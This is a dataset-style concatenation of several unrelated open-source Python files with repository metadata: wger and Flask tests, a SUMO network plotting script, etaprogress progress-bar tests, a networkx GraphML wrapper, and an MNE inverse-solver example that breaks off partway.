cont = self.data[idx]
cont = cont.strip()
cont = cont.replace(")", "")
cont = cont.replace("(", "")
cont = cont.replace("(", "")
cont = cont.replace("\n", ",")
cont = cont.replace(" ", " ")
cont = cont.replace(" ", " ")
if len(cont) > 1:
_frame, cont = cont.split(" ", 1)
cont = cont.strip(" ,")
data = np.fromstring(cont, sep=",", dtype=np.uint16).reshape(-1, 2)
return data
def __len__(self):
return len(self.data)
def _index_file(self):
"""Open and index the contour file
This function populates the internal list of contours
as strings which will be available as `self.data`.
"""
with self.filename.open() as fd:
data = fd.read()
ident = "Contour in frame"
self._data = data.split(ident)[1:]
self._initialized = True
@property
def data(self):
"""Access self.data
If `self._index_file` has not been computed before, this
property will cause it to do so.
"""
if not self._initialized:
self._index_file()
return self._data
def get_frame(self, idx):
"""Return the frame number of a contour"""
cont = self.data[idx]
# previously was split using " ", but "(" is more general
frame = int(cont.strip().split("(", 1)[0])
return frame
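# Illustrative usage sketch (not part of the original module); the file name is
# a hypothetical placeholder for an MX_contours.txt written next to a tdms
# measurement:
#
#     import pathlib
#     cd = ContourData(pathlib.Path("M1_0.240000ul_s_contours.txt"))
#     print(len(cd))          # number of contours indexed in the text file
#     print(cd.get_frame(0))  # frame number of the first contour
#     print(cd[0].shape)      # (N, 2) array of x/y pixel coordinates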
|
gpl-2.0
| -762,820,162,700,823,400 | 35.443089 | 79 | 0.521695 | false |
wger-project/wger
|
wger/gym/tests/test_contract_options.py
|
1
|
2911
|
# This file is part of wger Workout Manager.
#
# wger Workout Manager is free software: you can redistribute it and/or modify
# it under the terms of the GNU Affero General Public License as published by
# the Free Software Foundation, either version 3 of the License, or
# (at your option) any later version.
#
# wger Workout Manager is distributed in the hope that it will be useful,
# but WITHOUT ANY WARRANTY; without even the implied warranty of
# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
# GNU General Public License for more details.
#
# You should have received a copy of the GNU Affero General Public License
# along with this program. If not, see <http://www.gnu.org/licenses/>.
# Django
from django.urls import reverse
# wger
from wger.core.tests.base_testcase import (
WgerAccessTestCase,
WgerAddTestCase,
WgerDeleteTestCase,
WgerEditTestCase,
delete_testcase_add_methods,
)
from wger.gym.models import ContractOption
class AddContractOptionTestCase(WgerAddTestCase):
"""
Tests creating a new contract option
"""
object_class = ContractOption
url = reverse('gym:contract-option:add', kwargs={'gym_pk': 1})
data = {'name': 'Some name'}
user_success = (
'manager1',
'manager2',
)
user_fail = (
'admin',
'general_manager1',
'manager3',
'manager4',
'test',
'member1',
'member2',
'member3',
'member4',
'member5',
)
class EditContractOptionTestCase(WgerEditTestCase):
"""
Tests editing a contract option
"""
pk = 1
object_class = ContractOption
url = 'gym:contract-option:edit'
user_success = ('manager1', 'manager2')
user_fail = (
'admin',
'general_manager1',
'manager3',
'manager4',
'test',
'member1',
'member2',
'member3',
'member4',
'member5',
)
data = {'name': 'Standard contract 16-Gj'}
class DeleteContractOptionTestCase(WgerDeleteTestCase):
"""
Tests deleting a contract option
"""
pk = 1
object_class = ContractOption
url = 'gym:contract-option:delete'
user_success = ('manager1', 'manager2')
user_fail = (
'admin',
'general_manager1',
'manager3',
'manager4',
'test',
'member1',
'member2',
'member3',
'member4',
'member5',
)
delete_testcase_add_methods(DeleteContractOptionTestCase)
class AccessContractOptionOverviewTestCase(WgerAccessTestCase):
"""
Test accessing the contract option page
"""
url = reverse('gym:contract-option:list', kwargs={'gym_pk': 1})
user_success = ('manager1', 'manager2')
user_fail = (
'admin',
'general_manager1',
'manager3',
'manager4',
'test',
'member1',
'member2',
'member3',
'member4',
'member5',
)
|
agpl-3.0
| 4,026,260,675,147,435,000 | 22.860656 | 78 | 0.608382 | false |
smendez-hi/SUMO-hib
|
tools/visualization/mpl_dump_onNet.py
|
1
|
17971
|
#!/usr/bin/env python
"""
@file mpl_dump_onNet.py
@author Daniel Krajzewicz
@author Michael Behrisch
@date 2007-10-25
@version $Id: mpl_dump_onNet.py 11671 2012-01-07 20:14:30Z behrisch $
This script reads a network and a dump file and
draws the network, coloring it by the values
found within the dump-file.
matplotlib has to be installed for this purpose
SUMO, Simulation of Urban MObility; see http://sumo.sourceforge.net/
Copyright (C) 2008-2012 DLR (http://www.dlr.de/) and contributors
All rights reserved
"""
from matplotlib import rcParams
from pylab import *
import os, string, sys, StringIO
import math
from optparse import OptionParser
from xml.sax import saxutils, make_parser, handler
def toHex(val):
"""Converts the given value (0-255) into its hexadecimal representation"""
hex = "0123456789abcdef"
return hex[int(val/16)] + hex[int(val - int(val/16)*16)]
def toFloat(val):
"""Converts the given value (0-255) into its hexadecimal representation"""
hex = "0123456789abcdef"
return float(hex.find(val[0])*16 + hex.find(val[1]))
def toColor(val, colormap):
"""Converts the given value (0-1) into a color definition parseable by matplotlib"""
for i in range(0, len(colormap)-1):
if colormap[i+1][0]>val:
scale = (val - colormap[i][0]) / (colormap[i+1][0] - colormap[i][0])
r = colormap[i][1][0] + (colormap[i+1][1][0] - colormap[i][1][0]) * scale
g = colormap[i][1][1] + (colormap[i+1][1][1] - colormap[i][1][1]) * scale
b = colormap[i][1][2] + (colormap[i+1][1][2] - colormap[i][1][2]) * scale
return "#" + toHex(r) + toHex(g) + toHex(b)
return "#" + toHex(colormap[-1][1][0]) + toHex(colormap[-1][1][1]) + toHex(colormap[-1][1][2])
def parseColorMap(mapDef):
ret = []
defs = mapDef.split(",")
for d in defs:
(value, color) = d.split(":")
r = color[1:3]
g = color[3:5]
b = color[5:7]
ret.append( (float(value), ( toFloat(r), toFloat(g), toFloat(b) ) ) )
return ret
class NetReader(handler.ContentHandler):
"""Reads a network, storing the edge geometries, lane numbers and max. speeds"""
def __init__(self):
self._id = ''
self._edge2lanes = {}
self._edge2speed = {}
self._edge2shape = {}
self._edge2from = {}
self._edge2to = {}
self._node2x = {}
self._node2y = {}
self._currentShapes = []
self._parseLane = False
def startElement(self, name, attrs):
self._parseLane = False
if name == 'edge':
if not attrs.has_key('function') or attrs['function'] != 'internal':
self._id = attrs['id']
self._edge2from[attrs['id']] = attrs['from']
self._edge2to[attrs['id']] = attrs['to']
self._edge2lanes[attrs['id']] = 0
self._currentShapes = []
else:
self._id = ""
if name == 'lane' and self._id!="":
self._edge2speed[self._id] = float(attrs['maxspeed'])
self._edge2lanes[self._id] = self._edge2lanes[self._id] + 1
self._parseLane = True
self._currentShapes.append(attrs["shape"])
if name == 'junction':
self._id = attrs['id']
if self._id[0]!=':':
self._node2x[attrs['id']] = attrs['x']
self._node2y[attrs['id']] = attrs['y']
else:
self._id = ""
def endElement(self, name):
if self._parseLane:
self._parseLane = False
if name == 'edge' and self._id!="":
noShapes = len(self._currentShapes)
if noShapes%2 == 1 and noShapes>0:
self._edge2shape[self._id] = self._currentShapes[int(noShapes/2)]
elif noShapes%2 == 0 and len(self._currentShapes[0])!=2:
cshapes = []
minLen = -1
for i in self._currentShapes:
cshape = []
es = i.split(" ")
for e in es:
p = e.split(",")
cshape.append((float(p[0]), float(p[1])))
cshapes.append(cshape)
if minLen==-1 or minLen>len(cshape):
minLen = len(cshape)
self._edge2shape[self._id] = ""
if minLen>2:
for i in range(0, minLen):
x = 0.
y = 0.
for j in range(0, noShapes):
x = x + cshapes[j][i][0]
y = y + cshapes[j][i][1]
x = x / float(noShapes)
y = y / float(noShapes)
if self._edge2shape[self._id] != "":
self._edge2shape[self._id] = self._edge2shape[self._id] + " "
self._edge2shape[self._id] = self._edge2shape[self._id] + str(x) + "," + str(y)
def plotData(self, weights, options, values1, values2, saveName, colorMap):
edge2plotLines = {}
edge2plotColors = {}
edge2plotWidth = {}
xmin = 10000000.
xmax = -10000000.
ymin = 10000000.
ymax = -10000000.
min_width = 0
if options.min_width:
min_width = options.min_width
for edge in self._edge2from:
# compute shape
xs = []
ys = []
if edge not in self._edge2shape or self._edge2shape[edge]=="":
xs.append(float(self._node2x[self._edge2from[edge]]))
xs.append(float(self._node2x[self._edge2to[edge]]))
ys.append(float(self._node2y[self._edge2from[edge]]))
ys.append(float(self._node2y[self._edge2to[edge]]))
else:
shape = self._edge2shape[edge].split(" ")
l = []
for s in shape:
p = s.split(",")
xs.append(float(p[0]))
ys.append(float(p[1]))
for x in xs:
if x<xmin:
xmin = x
if x>xmax:
xmax = x
for y in ys:
if y<ymin:
ymin = y
if y>ymax:
ymax = y
# save shape
edge2plotLines[edge] = (xs, ys)
# compute color
if edge in values2:
c = values2[edge]
else:
c = 0
edge2plotColors[edge] = toColor(c, colorMap)
# compute width
if edge in values1:
w = values1[edge]
if w>0:
w = 10. * math.log(1 + values1[edge]) + min_width
else:
w = min_width
if options.max_width and w>options.max_width:
w = options.max_width
if w<min_width:
w = min_width
edge2plotWidth[edge] = w
else:
edge2plotWidth[edge] = min_width
if options.verbose:
print "x-limits: " + str(xmin) + " - " + str(xmax)
print "y-limits: " + str(ymin) + " - " + str(ymax)
if not options.show:
rcParams['backend'] = 'Agg'
# set figure size
if options.size and not options.show:
            f = figure(figsize=[float(v) for v in options.size.split(",")])
else:
f = figure()
for edge in edge2plotLines:
plot(edge2plotLines[edge][0], edge2plotLines[edge][1], color=edge2plotColors[edge], linewidth=edge2plotWidth[edge])
# set axes
if options.xticks!="":
(xb, xe, xd, xs) = options.xticks.split(",")
xticks(arange(xb, xe, xd), size = xs)
if options.yticks!="":
(yb, ye, yd, ys) = options.yticks.split(",")
yticks(arange(yb, ye, yd), size = ys)
if options.xlim!="":
(xb, xe) = options.xlim.split(",")
xlim(int(xb), int(xe))
else:
xlim(xmin, xmax)
if options.ylim!="":
(yb, ye) = options.ylim.split(",")
ylim(int(yb), int(ye))
else:
ylim(ymin, ymax)
if saveName:
savefig(saveName);
if options.show:
show()
def plot(self, weights, options, colorMap):
self._minValue1 = weights._minValue1
self._minValue2 = weights._minValue2
self._maxValue1 = weights._maxValue1
self._maxValue2 = weights._maxValue2
if options.join:
self.plotData(weights, options, weights._edge2value1, weights._edge2value2, options.output, colorMap)
else:
for i in weights._intervalBegins:
if options.verbose:
print " Processing step %d..." % i
output = options.output
if output:
output = output.replace("HERE", "%")
output = output % i
self.plotData(weights, options, weights._unaggEdge2value1[i], weights._unaggEdge2value2[i], output, colorMap )
def knowsEdge(self, id):
return id in self._edge2from
class WeightsReader(handler.ContentHandler):
"""Reads the dump file"""
def __init__(self, net, value1, value2):
self._id = ''
self._edge2value2 = {}
self._edge2value1 = {}
self._edge2no1 = {}
self._edge2no2 = {}
self._net = net
self._intervalBegins = []
self._unaggEdge2value2 = {}
self._unaggEdge2value1 = {}
self._beginTime = -1
self._value1 = value1
self._value2 = value2
def startElement(self, name, attrs):
if name == 'interval':
self._beginTime = int(attrs['begin'])
self._intervalBegins.append(self._beginTime)
self._unaggEdge2value2[self._beginTime] = {}
self._unaggEdge2value1[self._beginTime] = {}
if name == 'edge':
if self._net.knowsEdge(attrs['id']):
self._id = attrs['id']
if self._id not in self._edge2value2:
self._edge2value2[self._id] = 0
self._edge2value1[self._id] = 0
self._edge2no1[self._id] = 0
self._edge2no2[self._id] = 0
value1 = self._value1
if attrs.has_key(value1):
value1 = float(attrs[value1])
self._edge2no1[self._id] = self._edge2no1[self._id] + 1
else:
value1 = float(value1)
self._edge2value1[self._id] = self._edge2value1[self._id] + value1
self._unaggEdge2value1[self._beginTime][self._id] = value1
value2 = self._value2
if attrs.has_key(value2):
value2 = float(attrs[value2])
self._edge2no2[self._id] = self._edge2no2[self._id] + 1
else:
value2 = float(value2)
self._edge2value2[self._id] = self._edge2value2[self._id] + value2
self._unaggEdge2value2[self._beginTime][self._id] = value2
def updateExtrema(self, values1ByEdge, values2ByEdge):
for edge in values1ByEdge:
if self._minValue1==-1 or self._minValue1>values1ByEdge[edge]:
self._minValue1 = values1ByEdge[edge]
if self._maxValue1==-1 or self._maxValue1<values1ByEdge[edge]:
self._maxValue1 = values1ByEdge[edge]
if self._minValue2==-1 or self._minValue2>values2ByEdge[edge]:
self._minValue2 = values2ByEdge[edge]
if self._maxValue2==-1 or self._maxValue2<values2ByEdge[edge]:
self._maxValue2 = values2ByEdge[edge]
def valueDependantNorm(self, values, minV, maxV, tendency, percSpeed):
if tendency:
for edge in self._edge2value2:
if values[edge]<0:
values[edge] = 0
else:
values[edge] = 1
elif percSpeed:
for edge in self._edge2value2:
values[edge] = (values[edge] / self._net._edge2speed[edge])
elif minV!=maxV:
for edge in self._edge2value2:
values[edge] = (values[edge] - minV) / (maxV - minV)
def norm(self, tendency, percSpeed):
self._minValue1 = -1
self._maxValue1 = -1
self._minValue2 = -1
self._maxValue2 = -1
# compute mean value if join is set
if options.join:
for edge in self._edge2value2:
if float(self._edge2no1[edge])!=0:
self._edge2value1[edge] = float(self._edge2value1[edge]) / float(self._edge2no1[edge])
else:
self._edge2value1[edge] = float(self._edge2value1[edge])
if float(self._edge2no2[edge])!=0:
self._edge2value2[edge] = float(self._edge2value2[edge]) / float(self._edge2no2[edge])
else:
self._edge2value2[edge] = float(self._edge2value2[edge])
# compute min/max
if options.join:
self.updateExtrema(self._edge2value1, self._edge2value2)
else:
for i in weights._intervalBegins:
self.updateExtrema(self._unaggEdge2value1[i], self._unaggEdge2value2[i])
# norm
if options.verbose:
print "w range: " + str(self._minValue1) + " - " + str(self._maxValue1)
print "c range: " + str(self._minValue2) + " - " + str(self._maxValue2)
if options.join:
self.valueDependantNorm(self._edge2value1, self._minValue1, self._maxValue1, False, percSpeed and self._value1=="speed")
self.valueDependantNorm(self._edge2value2, self._minValue2, self._maxValue2, tendency, percSpeed and self._value2=="speed")
else:
for i in weights._intervalBegins:
self.valueDependantNorm(self._unaggEdge2value1[i], self._minValue1, self._maxValue1, False, percSpeed and self._value1=="speed")
self.valueDependantNorm(self._unaggEdge2value2[i], self._minValue2, self._maxValue2, tendency, percSpeed and self._value2=="speed")
# initialise
optParser = OptionParser()
optParser.add_option("-v", "--verbose", action="store_true", dest="verbose",
default=False, help="tell me what you are doing")
# i/o
optParser.add_option("-n", "--net-file", dest="net",
help="SUMO network to use (mandatory)", metavar="FILE")
optParser.add_option("-d", "--dump", dest="dump",
help="dump file to use", metavar="FILE")
optParser.add_option("-o", "--output", dest="output",
help="(base) name for the output", metavar="FILE")
# data handling
optParser.add_option("-j", "--join", action="store_true", dest="join",
default=False, help="sums up values from all read intervals")
optParser.add_option("-w", "--min-width", dest="min_width",
type="float", help="sets minimum line width")
optParser.add_option("-W", "--max-width", dest="max_width",
type="float", help="sets maximum line width")
optParser.add_option("-c", "--min-color", dest="min_color",
type="float", help="sets minimum color (between 0 and 1)")
optParser.add_option("-C", "--max-color", dest="max_color",
type="float", help="sets maximum color (between 0 and 1)")
optParser.add_option("--tendency-coloring", action="store_true", dest="tendency_coloring",
default=False, help="show only 0/1 color for egative/positive values")
optParser.add_option("--percentage-speed", action="store_true", dest="percentage_speed",
default=False, help="speed is normed to maximum allowed speed on an edge")
optParser.add_option("--values", dest="values",
type="string", default="entered,speed", help="which values shall be parsed")
optParser.add_option("--color-map", dest="colormap",
type="string", default="0:#ff0000,.5:#ffff00,1:#00ff00", help="Defines the color map")
# axes/legend
optParser.add_option("--xticks", dest="xticks",type="string", default="",
help="defines ticks on x-axis")
optParser.add_option("--yticks", dest="yticks",type="string", default="",
help="defines ticks on y-axis")
optParser.add_option("--xlim", dest="xlim",type="string", default="",
help="defines x-axis range")
optParser.add_option("--ylim", dest="ylim",type="string", default="",
help="defines y-axis range")
# output
optParser.add_option("--size", dest="size",type="string", default="",
help="defines the output size")
# processing
optParser.add_option("-s", "--show", action="store_true", dest="show",
default=False, help="shows each plot after generating it")
# parse options
(options, args) = optParser.parse_args()
# check set options
if not options.show and not options.output:
print "Neither show (--show) not write (--output <FILE>)? Exiting..."
exit()
# init color map
colorMap = parseColorMap(options.colormap)
# read network
if options.verbose:
print "Reading net..."
parser = make_parser()
net = NetReader()
parser.setContentHandler(net)
parser.parse(options.net)
# read weights
if options.verbose:
print "Reading weights..."
mValues = options.values.split(",")
weights = WeightsReader(net, mValues[0], mValues[1])
parser.setContentHandler(weights)
parser.parse(options.dump)
# process
if options.verbose:
print "Norming weights..."
weights.norm(options.tendency_coloring, options.percentage_speed)
if options.verbose:
print "Plotting..."
net.plot(weights, options, colorMap)
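# Illustrative invocations (not part of the original script); the file names are
# hypothetical placeholders showing how the options defined above combine:
#
#   python mpl_dump_onNet.py -n net.net.xml -d dump.xml --values entered,speed \
#          --join -o aggregated.png
#   python mpl_dump_onNet.py -n net.net.xml -d dump.xml -o plot_HEREd.png
#
# Without --join, "HERE" in the output name is replaced by "%" and the result is
# formatted with each interval's begin time (see NetReader.plot above), so
# plot_HEREd.png yields plot_0.png, plot_60.png, and so on.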
|
gpl-3.0
| -7,227,673,384,518,771,000 | 38.935556 | 147 | 0.537032 | false |
Robpol86/etaprogress
|
tests/test_progress_progressbar.py
|
1
|
6277
|
from etaprogress import eta
from etaprogress.components import misc
from etaprogress.progress import ProgressBar
def test_terminal_width():
assert 80 == misc.terminal_width()
def test_undefined():
misc.terminal_width = lambda: 40
progress_bar = ProgressBar(None, max_width=30)
assert '0 [? ] eta --:-- /' == str(progress_bar)
assert '0 [ ? ] eta --:-- -' == str(progress_bar)
assert '0 [ ? ] eta --:-- \\' == str(progress_bar)
eta._NOW = lambda: 1411868722.0
progress_bar.numerator = 10
assert '10 [ ? ] eta --:-- |' == str(progress_bar)
assert '10 [ ? ] eta --:-- /' == str(progress_bar)
eta._NOW = lambda: 1411868722.5
progress_bar.numerator = 100
assert '100 [ ? ] eta --:-- -' == str(progress_bar)
eta._NOW = lambda: 1411868723.0
progress_bar.numerator = 1954727
assert '1,954,727 [ ? ] eta --:-- \\' == str(progress_bar)
assert '1,954,727 [ ? ] eta --:-- |' == str(progress_bar)
def test_defined():
progress_bar = ProgressBar(2000)
assert ' 0% ( 0/2,000) [ ] eta --:-- /' == str(progress_bar)
assert ' 0% ( 0/2,000) [ ] eta --:-- -' == str(progress_bar)
assert ' 0% ( 0/2,000) [ ] eta --:-- \\' == str(progress_bar)
eta._NOW = lambda: 1411868722.0
progress_bar.numerator = 102
assert ' 5% ( 102/2,000) [ ] eta --:-- |' == str(progress_bar)
assert ' 5% ( 102/2,000) [ ] eta --:-- /' == str(progress_bar)
eta._NOW = lambda: 1411868722.5
progress_bar.numerator = 281
assert ' 14% ( 281/2,000) [ ] eta 00:05 -' == str(progress_bar)
eta._NOW = lambda: 1411868723.0
progress_bar.numerator = 593
assert ' 29% ( 593/2,000) [## ] eta 00:03 \\' == str(progress_bar)
eta._NOW = lambda: 1411868723.5
progress_bar.numerator = 1925
assert ' 96% (1,925/2,000) [###### ] eta 00:01 |' == str(progress_bar)
eta._NOW = lambda: 1411868724.0
progress_bar.numerator = 1999
assert ' 99% (1,999/2,000) [###### ] eta 00:01 /' == str(progress_bar)
eta._NOW = lambda: 1411868724.5
progress_bar.numerator = 2000
assert '100% (2,000/2,000) [#######] eta 00:00 -' == str(progress_bar)
assert '100% (2,000/2,000) [#######] eta 00:00 \\' == str(progress_bar)
assert '100% (2,000/2,000) [#######] eta 00:00 |' == str(progress_bar)
def test_defined_hour():
progress_bar = ProgressBar(2000)
assert ' 0% ( 0/2,000) [ ] eta --:-- /' == str(progress_bar)
eta._NOW = lambda: 1411868722.0
progress_bar.numerator = 1
assert ' 0% ( 1/2,000) [ ] eta --:-- -' == str(progress_bar)
eta._NOW = lambda: 1411868724.0
progress_bar.numerator = 2
assert ' 0% ( 2/2,000) [ ] eta 1:06:36 \\' == str(progress_bar)
def test_defined_wont_fit():
progress_bar = ProgressBar(2000, max_width=33)
assert ' 0% ( 0/2,000) [] eta --:-- |' == str(progress_bar)
progress_bar = ProgressBar(2000, max_width=30)
assert ' 0% ( 0/2,000) [] eta --:-- /' == str(progress_bar)
def test_defined_long():
progress_bar = ProgressBar(20)
assert ' 0% ( 0/20) [ ] eta --:-- -' == str(progress_bar)
assert ' 0% ( 0/20) [ ] eta --:-- \\' == str(progress_bar)
eta._NOW = lambda: 1411868722.0
progress_bar.numerator = 1
assert ' 5% ( 1/20) [ ] eta --:-- |' == str(progress_bar)
assert ' 5% ( 1/20) [ ] eta --:-- /' == str(progress_bar)
eta._NOW = lambda: 1411868722.5
progress_bar.numerator = 2
assert ' 10% ( 2/20) [# ] eta 00:09 -' == str(progress_bar)
eta._NOW = lambda: 1411868723.0
progress_bar.numerator = 3
assert ' 15% ( 3/20) [# ] eta 00:09 \\' == str(progress_bar)
eta._NOW = lambda: 1411868723.5
progress_bar.numerator = 4
assert ' 20% ( 4/20) [## ] eta 00:08 |' == str(progress_bar)
eta._NOW = lambda: 1411868724.0
progress_bar.numerator = 5
assert ' 25% ( 5/20) [### ] eta 00:08 /' == str(progress_bar)
eta._NOW = lambda: 1411868724.5
progress_bar.numerator = 6
assert ' 30% ( 6/20) [### ] eta 00:07 -' == str(progress_bar)
eta._NOW = lambda: 1411868725.0
progress_bar.numerator = 7
assert ' 35% ( 7/20) [#### ] eta 00:07 \\' == str(progress_bar)
eta._NOW = lambda: 1411868725.5
progress_bar.numerator = 8
assert ' 40% ( 8/20) [##### ] eta 00:06 |' == str(progress_bar)
eta._NOW = lambda: 1411868726.0
progress_bar.numerator = 9
assert ' 45% ( 9/20) [##### ] eta 00:06 /' == str(progress_bar)
eta._NOW = lambda: 1411868726.5
progress_bar.numerator = 10
assert ' 50% (10/20) [###### ] eta 00:05 -' == str(progress_bar)
eta._NOW = lambda: 1411868727.0
progress_bar.numerator = 11
assert ' 55% (11/20) [####### ] eta 00:05 \\' == str(progress_bar)
eta._NOW = lambda: 1411868727.5
progress_bar.numerator = 12
assert ' 60% (12/20) [####### ] eta 00:04 |' == str(progress_bar)
eta._NOW = lambda: 1411868728.0
progress_bar.numerator = 13
assert ' 65% (13/20) [######## ] eta 00:04 /' == str(progress_bar)
eta._NOW = lambda: 1411868728.5
progress_bar.numerator = 14
assert ' 70% (14/20) [######### ] eta 00:03 -' == str(progress_bar)
eta._NOW = lambda: 1411868729.0
progress_bar.numerator = 15
assert ' 75% (15/20) [######### ] eta 00:03 \\' == str(progress_bar)
eta._NOW = lambda: 1411868729.5
progress_bar.numerator = 16
assert ' 80% (16/20) [########## ] eta 00:02 |' == str(progress_bar)
eta._NOW = lambda: 1411868730.0
progress_bar.numerator = 17
assert ' 85% (17/20) [########### ] eta 00:02 /' == str(progress_bar)
eta._NOW = lambda: 1411868730.5
progress_bar.numerator = 18
assert ' 90% (18/20) [########### ] eta 00:01 -' == str(progress_bar)
eta._NOW = lambda: 1411868731.0
progress_bar.numerator = 19
assert ' 95% (19/20) [############ ] eta 00:01 \\' == str(progress_bar)
eta._NOW = lambda: 1411868731.5
progress_bar.numerator = 20
assert '100% (20/20) [#############] eta 00:00 |' == str(progress_bar)
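# --- Illustrative usage sketch (not part of the original test module) ---
# The tests above drive the bar by stubbing eta._NOW; this hedged sketch shows
# ordinary usage with real wall-clock time. It assumes the etaprogress-style API
# exercised above (ProgressBar(denominator), a writable .numerator, str() rendering);
# the helper name and the sleep call are illustrative only.
def _example_progress_loop(total=2000):
    import sys
    import time
    bar = ProgressBar(total)
    for done in range(1, total + 1):
        time.sleep(0.001)  # stand-in for real work
        bar.numerator = done
        sys.stderr.write('\r' + str(bar))
        sys.stderr.flush()
    sys.stderr.write('\n')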
|
mit
| -125,128,488,527,557,390 | 34.868571 | 75 | 0.531145 | false |
schmidtj/PyGNA
|
PyGNA/graphMLRead.py
|
1
|
1143
|
'''
This is a wrapper for the networkx graphml read/writer so that the GNA can
read a graphml file with multiple graphs. The current networkx read_graphml
only returns the first element in the graph list that is returned by the
graphMLReader class.
'''
import networkx.readwrite.graphml as ml
def read_graphml(path,node_type=str):
"""Read graph in GraphML format from path.
Parameters
----------
path : file or string
       File or filename to read.
       Filenames ending in .gz or .bz2 will be decompressed.
node_type: Python type (default: str)
Convert node ids to this type
Returns
-------
list(graphs): List of NetworkX graphs
If no parallel edges are found a Graph or DiGraph is returned.
Otherwise a MultiGraph or MultiDiGraph is returned.
"""
# **Deprecated ** fh=ml._get_fh(path,mode='rb')
    reader = ml.GraphMLReader(node_type=node_type)
# need to check for multiple graphs
glist=list(reader(path))
#return glist[0] <---- The current networkx read_graphml return value
return glist # <---- returns the full list of graphs read from a file
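# --- Illustrative usage sketch (not part of the original module) ---
# A hedged example of reading every graph from a multi-graph GraphML file and
# printing basic sizes; the file name below is hypothetical.
if __name__ == '__main__':
    graphs = read_graphml('example_multi.graphml')
    for index, graph in enumerate(graphs):
        print('graph %d: %d nodes, %d edges' % (
            index, graph.number_of_nodes(), graph.number_of_edges()))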
|
bsd-3-clause
| 4,107,397,642,745,463,300 | 33.666667 | 76 | 0.67804 | false |
dlarochelle/extractor_train
|
tests/test_forms.py
|
1
|
2252
|
# -*- coding: utf-8 -*-
import pytest
from extractor_train.public.forms import LoginForm
from extractor_train.user.forms import RegisterForm
from .factories import UserFactory
class TestRegisterForm:
def test_validate_user_already_registered(self, user):
# Enters username that is already registered
form = RegisterForm(username=user.username, email='[email protected]',
password='example', confirm='example')
assert form.validate() is False
assert 'Username already registered' in form.username.errors
def test_validate_email_already_registered(self, user):
# enters email that is already registered
form = RegisterForm(username='unique', email=user.email,
password='example', confirm='example')
assert form.validate() is False
assert 'Email already registered' in form.email.errors
def test_validate_success(self, db):
form = RegisterForm(username='newusername', email='[email protected]',
password='example', confirm='example')
assert form.validate() is True
class TestLoginForm:
def test_validate_success(self, user):
user.set_password('example')
user.save()
form = LoginForm(username=user.username, password='example')
assert form.validate() is True
assert form.user == user
def test_validate_unknown_username(self, db):
form = LoginForm(username='unknown', password='example')
assert form.validate() is False
assert 'Unknown username' in form.username.errors
assert form.user is None
def test_validate_invalid_password(self, user):
user.set_password('example')
user.save()
form = LoginForm(username=user.username, password='wrongpassword')
assert form.validate() is False
assert 'Invalid password' in form.password.errors
def test_validate_inactive_user(self, user):
user.active = False
user.set_password('example')
user.save()
# Correct username and password, but user is not activated
form = LoginForm(username=user.username, password='example')
assert form.validate() is False
assert 'User not activated' in form.username.errors
|
bsd-3-clause
| -4,317,048,631,488,596,000 | 35.934426 | 74 | 0.672735 | false |
mne-tools/mne-tools.github.io
|
0.15/_downloads/plot_custom_inverse_solver.py
|
1
|
6931
|
# -*- coding: utf-8 -*-
"""
================================================
Source localization with a custom inverse solver
================================================
The objective of this example is to show how to plug a custom inverse solver
in MNE in order to facilate empirical comparison with the methods MNE already
implements (wMNE, dSPM, sLORETA, LCMV, (TF-)MxNE etc.).
This script is educational and is intended for methods
evaluation and new developments. It is not meant to be an example
of good practice for analysing your data.
The example makes use of 2 functions ``apply_solver`` and ``solver``
so changes can be limited to the ``solver`` function (which only takes three
parameters: the whitened data, the gain matrix, and the number of orientations)
in order to try out another inverse algorithm.
"""
import numpy as np
from scipy import linalg
import mne
from mne.datasets import sample
from mne.viz import plot_sparse_source_estimates
data_path = sample.data_path()
fwd_fname = data_path + '/MEG/sample/sample_audvis-meg-eeg-oct-6-fwd.fif'
ave_fname = data_path + '/MEG/sample/sample_audvis-ave.fif'
cov_fname = data_path + '/MEG/sample/sample_audvis-shrunk-cov.fif'
subjects_dir = data_path + '/subjects'
condition = 'Left Auditory'
# Read noise covariance matrix
noise_cov = mne.read_cov(cov_fname)
# Handling average file
evoked = mne.read_evokeds(ave_fname, condition=condition, baseline=(None, 0))
evoked.crop(tmin=0.04, tmax=0.18)
evoked = evoked.pick_types(eeg=False, meg=True)
# Handling forward solution
forward = mne.read_forward_solution(fwd_fname)
###############################################################################
# Auxiliary function to run the solver
def apply_solver(solver, evoked, forward, noise_cov, loose=0.2, depth=0.8):
"""Function to call a custom solver on evoked data
This function does all the necessary computation:
- to select the channels in the forward given the available ones in
the data
- to take into account the noise covariance and do the spatial whitening
- to apply loose orientation constraint as MNE solvers
    - to apply a weighting of the columns of the forward operator as in the
weighted Minimum Norm formulation in order to limit the problem
of depth bias.
Parameters
----------
solver : callable
The solver takes 3 parameters: data M, gain matrix G, number of
dipoles orientations per location (1 or 3). A solver shall return
2 variables: X which contains the time series of the active dipoles
and an active set which is a boolean mask to specify what dipoles are
present in X.
evoked : instance of mne.Evoked
The evoked data
forward : instance of Forward
The forward solution.
noise_cov : instance of Covariance
The noise covariance.
loose : float in [0, 1] | 'auto'
Value that weights the source variances of the dipole components
that are parallel (tangential) to the cortical surface. If loose
is 0 then the solution is computed with fixed orientation.
If loose is 1, it corresponds to free orientations.
The default value ('auto') is set to 0.2 for surface-oriented source
space and set to 1.0 for volumic or discrete source space.
depth : None | float in [0, 1]
Depth weighting coefficients. If None, no depth weighting is performed.
Returns
-------
stc : instance of SourceEstimate
The source estimates.
"""
# Import the necessary private functions
from mne.inverse_sparse.mxne_inverse import \
(_prepare_gain, _check_loose_forward, is_fixed_orient,
_reapply_source_weighting, _make_sparse_stc)
all_ch_names = evoked.ch_names
loose, forward = _check_loose_forward(loose, forward)
# put the forward solution in fixed orientation if it's not already
if loose == 0. and not is_fixed_orient(forward):
forward = mne.convert_forward_solution(
forward, surf_ori=True, force_fixed=True, copy=True, use_cps=True)
# Handle depth weighting and whitening (here is no weights)
gain, gain_info, whitener, source_weighting, mask = _prepare_gain(
forward, evoked.info, noise_cov, pca=False, depth=depth,
loose=loose, weights=None, weights_min=None)
# Select channels of interest
sel = [all_ch_names.index(name) for name in gain_info['ch_names']]
M = evoked.data[sel]
# Whiten data
M = np.dot(whitener, M)
n_orient = 1 if is_fixed_orient(forward) else 3
X, active_set = solver(M, gain, n_orient)
X = _reapply_source_weighting(X, source_weighting, active_set, n_orient)
stc = _make_sparse_stc(X, active_set, forward, tmin=evoked.times[0],
tstep=1. / evoked.info['sfreq'])
return stc
###############################################################################
# Define your solver
def solver(M, G, n_orient):
"""Dummy solver
    It just runs L2-penalized regression and keeps the 10 strongest locations.
